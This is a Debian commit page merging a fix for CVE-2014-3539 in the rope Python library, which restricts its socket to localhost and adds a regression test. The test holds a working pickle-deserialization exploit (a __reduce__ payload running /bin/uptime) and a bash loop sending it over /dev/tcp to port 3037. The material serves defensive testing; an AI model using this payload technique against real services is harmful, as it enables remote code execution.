Commit 6c740f03 authored by Arnaud Fontaine's avatar Arnaud Fontaine

merge patched into master

parents 8b73febe 8b29730f
# see git-dpm(1) from git-dpm package
835afd55ba93a1632462d454b5be0985b6ca9794
835afd55ba93a1632462d454b5be0985b6ca9794
8b29730f46571086b880fee6be33f56623c613bc
8b29730f46571086b880fee6be33f56623c613bc
835afd55ba93a1632462d454b5be0985b6ca9794
835afd55ba93a1632462d454b5be0985b6ca9794
rope_0.10.3.orig.tar.gz
......
From 8b29730f46571086b880fee6be33f56623c613bc Mon Sep 17 00:00:00 2001
From: Arnaud Fontaine <arnau@debian.org>
Date: Thu, 26 Jan 2017 13:38:11 +0900
Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
=?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
=?UTF-8?q?/rope):?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
Author: Matěj Cepl <mcepl@cepl.eu>
Date: Tue Feb 10 12:34:20 2015 +0100
Just add reporter’s suggested reproducer
commit a6cb534debe9aff623b6b19ae2dedbf872069a50
Author: Matej Cepl <mcepl@cepl.eu>
Date: Thu Feb 12 01:12:15 2015 +0100
limit socket connections to localhost
Patch-Name: CVE-2014-3539
---
rope/base/oi/doa.py | 2 +-
ropetest/CVE20143539/CVE-2014-3539.py | 18 ++++++++++++++++++
ropetest/CVE20143539/README.md | 17 +++++++++++++++++
ropetest/CVE20143539/__init__.py | 32 ++++++++++++++++++++++++++++++++
ropetest/CVE20143539/generate_payload.py | 8 ++++++++
ropetest/CVE20143539/payload.txt | 9 +++++++++
ropetest/CVE20143539/project/hello.py | 1 +
ropetest/CVE20143539/run_reproducer.sh | 11 +++++++++++
ropetest/__init__.py | 3 +++
9 files changed, 100 insertions(+), 1 deletion(-)
create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
create mode 100644 ropetest/CVE20143539/README.md
create mode 100644 ropetest/CVE20143539/__init__.py
create mode 100644 ropetest/CVE20143539/generate_payload.py
create mode 100644 ropetest/CVE20143539/payload.txt
create mode 100644 ropetest/CVE20143539/project/hello.py
create mode 100644 ropetest/CVE20143539/run_reproducer.sh
diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
index de45902..ed44d25 100644
--- a/rope/base/oi/doa.py
+++ b/rope/base/oi/doa.py
@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037
while self.data_port < 4000:
try:
- self.server_socket.bind(('', self.data_port))
+ self.server_socket.bind(('127.0.0.1', self.data_port))
break
except socket.error:
self.data_port += 1
diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
new file mode 100644
index 0000000..5dd37e1
--- /dev/null
+++ b/ropetest/CVE20143539/CVE-2014-3539.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+# CVE-2014-3539 reproducer/exploit
+# Vasyl Kaigorodov <vkaigoro@redhat.com>
+# Tested on Python 2.7.x
+
+import sys
+from rope.base import project
+
+try:
+ open('payload.txt', 'r')
+except IOError:
+ print("payload.txt not found, run:")
+ print("\tpython generate_payload.py")
+ sys.exit(1)
+
+myproject = project.Project('project/')
+res = myproject.get_resource("hello.py")
+myproject.pycore.run_module(res)
diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
new file mode 100644
index 0000000..5c620ef
--- /dev/null
+++ b/ropetest/CVE20143539/README.md
@@ -0,0 +1,17 @@
+== List of files ==
+
+project/ - directory containing an example python module
+CVE-2014-3539.py - python script which tries to load an example python module
+ for re-factoring (normal workflow simulation)
+generate_payload.py - generates payload.txt (evil code to run)
+payload.txt - example payload (running /bin/uptime)
+run_reproducer.sh - main file that sticks above together
+
+== Usage ==
+
+Run ./run_reproducer.sh.
+If the system is vulnerable, you'll see the output similar to below:
+
+ $ ./run_reproducer.sh
+ SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
+
diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
new file mode 100644
index 0000000..3ab3be6
--- /dev/null
+++ b/ropetest/CVE20143539/__init__.py
@@ -0,0 +1,32 @@
+import os.path
+import subprocess
+try:
+ import unittest2 as unittest
+except ImportError:
+ import unittest
+
+
+class TestCVE20143539(unittest.TestCase):
+ def test_case(self):
+ cur_dir = os.path.dirname(__file__)
+ script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+ pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE, cwd=cur_dir)
+ pid.communicate()
+ self.assertEquals(pid.returncode, 0)
+
+
+def suite():
+ result = unittest.TestSuite()
+ result.addTests(unittest.makeSuite(TestCVE20143539))
+ return result
+
+
+if __name__ == '__main__':
+ import sys
+ if len(sys.argv) > 1:
+ unittest.main()
+ else:
+ runner = unittest.TextTestRunner()
+ res = runner.run(suite())
+ sys.exit(not res.wasSuccessful())
diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
new file mode 100644
index 0000000..c8d3e01
--- /dev/null
+++ b/ropetest/CVE20143539/generate_payload.py
@@ -0,0 +1,8 @@
+import cPickle
+import subprocess
+
+class RunBinSh(object):
+ def __reduce__(self):
+ return (subprocess.Popen, (('/bin/uptime',),))
+
+open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
new file mode 100644
index 0000000..434dd0f
--- /dev/null
+++ b/ropetest/CVE20143539/payload.txt
@@ -0,0 +1,9 @@
+csubprocess
+Popen
+p1
+((S'/bin/uptime'
+p2
+tp3
+tp4
+Rp5
+.
\ No newline at end of file
diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/ropetest/CVE20143539/project/hello.py
@@ -0,0 +1 @@
+print("Hello, World!")
diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
new file mode 100644
index 0000000..b1f7fac
--- /dev/null
+++ b/ropetest/CVE20143539/run_reproducer.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+trap "killall -- $(basename $0)" EXIT
+
+(while : ; do
+ ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+ && echo -n "SUCCESS: "
+done)&
+
+python CVE-2014-3539.py 2>/dev/null
+exit $?
diff --git a/ropetest/__init__.py b/ropetest/__init__.py
index f1cb459..744beee 100644
--- a/ropetest/__init__.py
+++ b/ropetest/__init__.py
@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib
import ropetest.refactor
+import ropetest.CVE20143539
+
def suite():
result = unittest.TestSuite()
@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite())
+ result.addTests(ropetest.CVE20143539.suite())
return result
......@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037
while self.data_port < 4000:
try:
self.server_socket.bind(('', self.data_port))
self.server_socket.bind(('127.0.0.1', self.data_port))
break
except socket.error:
self.data_port += 1
......
#!/usr/bin/env python
# CVE-2014-3539 reproducer/exploit
# Vasyl Kaigorodov <vkaigoro@redhat.com>
# Tested on Python 2.7.x
import sys
from rope.base import project
try:
open('payload.txt', 'r')
except IOError:
print("payload.txt not found, run:")
print("\tpython generate_payload.py")
sys.exit(1)
myproject = project.Project('project/')
res = myproject.get_resource("hello.py")
myproject.pycore.run_module(res)
== List of files ==
project/ - directory containing an example python module
CVE-2014-3539.py - python script which tries to load an example python module
for re-factoring (normal workflow simulation)
generate_payload.py - generates payload.txt (evil code to run)
payload.txt - example payload (running /bin/uptime)
run_reproducer.sh - main file that sticks above together
== Usage ==
Run ./run_reproducer.sh.
If the system is vulnerable, you'll see the output similar to below:
$ ./run_reproducer.sh
SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
import os.path
import subprocess
try:
import unittest2 as unittest
except ImportError:
import unittest
class TestCVE20143539(unittest.TestCase):
def test_case(self):
cur_dir = os.path.dirname(__file__)
script_name = os.path.join(cur_dir, 'run_reproducer.sh')
pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cur_dir)
pid.communicate()
self.assertEquals(pid.returncode, 0)
def suite():
result = unittest.TestSuite()
result.addTests(unittest.makeSuite(TestCVE20143539))
return result
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
unittest.main()
else:
runner = unittest.TextTestRunner()
res = runner.run(suite())
sys.exit(not res.wasSuccessful())
import cPickle
import subprocess
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/uptime',),))
open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
csubprocess
Popen
p1
((S'/bin/uptime'
p2
tp3
tp4
Rp5
.
\ No newline at end of file
#!/bin/bash
export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
trap "killall -- $(basename $0)" EXIT
(while : ; do
( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
&& echo -n "SUCCESS: "
done)&
python CVE-2014-3539.py 2>/dev/null
exit $?
......@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib
import ropetest.refactor
import ropetest.CVE20143539
def suite():
result = unittest.TestSuite()
......@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite())
result.addTests(ropetest.CVE20143539.suite())
return result
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment